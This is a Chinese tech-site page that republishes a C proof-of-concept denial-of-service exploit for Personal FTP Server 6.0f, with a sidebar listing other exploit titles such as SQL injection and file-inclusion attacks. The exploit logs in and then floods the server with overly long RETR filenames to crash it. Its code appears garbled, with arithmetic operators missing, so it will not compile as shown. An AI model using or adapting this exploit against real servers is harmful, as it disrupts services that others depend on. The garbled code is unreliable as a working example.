首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

The Personal FTP Server 6.0f RETR Denial of Service Exploit

所属分类: 网络安全 / Exploit 阅读数: 142
收藏 0 赞 0 分享
/*
*** The Personal FTP Server 6.0f RETR DOS exploit *** A vulnerability exists in the way Personal FTP Server handles
multiple RETR commands with overly long filenames.When confronted
with such consecutive requests the server will crash. Usage : ./pftpdos ip port user password
Ex. : ./pftpdos 127.0.0.1 21 test test Personal FTP Server homepage: http://www.michael-roth-software.de/ Discovey POC by Shinnok raydenxy [at] yahoo <dot> com
http://shinnok.evonet.ro */ #include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <string.h>
#include <malloc.h>
#include <errno.h> int
min (int x, int y)
{
if (x < y)return x;
else
return y;
}
extern int errno; int
main (int argc, char *argv[])
{
struct sockaddr_in server;
int i, t, s;
char *req, *buff;
s = socket (AF_INET, SOCK_STREAM, 0);
bzero (&server, sizeof (server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = inet_addr (argv[1]);
server.sin_port = htons (atoi (argv[2]));
connect (s, (struct sockaddr *) &server, sizeof (struct sockaddr));
req = malloc (sizeof (char) * \
(((strlen (argv[3]) - strlen (argv[4])) \
min (strlen (argv[3]), strlen (argv[4])) 8)));
sprintf (req, "USER %s\xD\xA", argv[3]);
write (s, req, strlen (req));
sprintf (req, "PASS %s\xD\xA", argv[4]);
write (s, req, strlen (req));
free (req);
for (i = 1; i <= 5; i )
{
t = (sizeof (char) * 1000 * i);
buff = malloc (t 1);
memset (buff, 'A', t);
buff[t 1] = '\0';
req = malloc (t 9);
sprintf (req, "RETR %s\xD\xA", buff);
if (write (s, req, strlen (req)) == -1)
{
perror (NULL);
printf ("Target pwned!\n", errno);
}
free (req);
free (buff);
sleep (1);
}
close (s);
return (EXIT_SUCCESS);
}
更多精彩内容其他人还在看

Mole Group Last Minute Script

-[*] ================================================================================ [*]- -[*] Last Minute Script <= 4.0 Remo
收藏 0 赞 0 分享

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

#!/usr/bin/perl #================================================= # BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit #================
收藏 0 赞 0 分享

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

# Name Of Script : Dolphin PHP # Version : 6.1.2 # Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dol
收藏 0 赞 0 分享

trixbox (langChoice) Local File Inclusion Exploit (connect-back)

#!/usr/bin/perl -w # Jean-Michel BESNARD - LEXSI Audit # 2008-07-08 # perl trixbox_fi.pl 192.168.1.212 # Please listen careful
收藏 0 赞 0 分享

Mole Group Real Estate Script

-[*] ================================================================================ [*]- -[*] Real Estate Script <= 1.1 Remot
收藏 0 赞 0 分享

Ultrastats

#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; # # [!] Discovered.: DNX # [!] Vendor.....: http://www.shooter-szen
收藏 0 赞 0 分享

Anzio Web Print Object

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ~ Core Security Technologies - CoreLabs Advisory ~ http://www.coresecur
收藏 0 赞 0 分享

VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - Orange Bat advisory - Name : VMWare Workstation (hcmon.sys 6.0.0.45731)
收藏 0 赞 0 分享

webEdition CMS (we_objectID) Blind SQL Injection Exploit

<?php ini_set("max_execution_time",0); print_r(' ############################################################### #
收藏 0 赞 0 分享

FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

#!/usr/bin/perl # k`sOSe 08/17/2008 # bypass safeseh using flash9f.ocx. use warnings; use strict; use IO::Socket; # win32_ex
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 www.zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22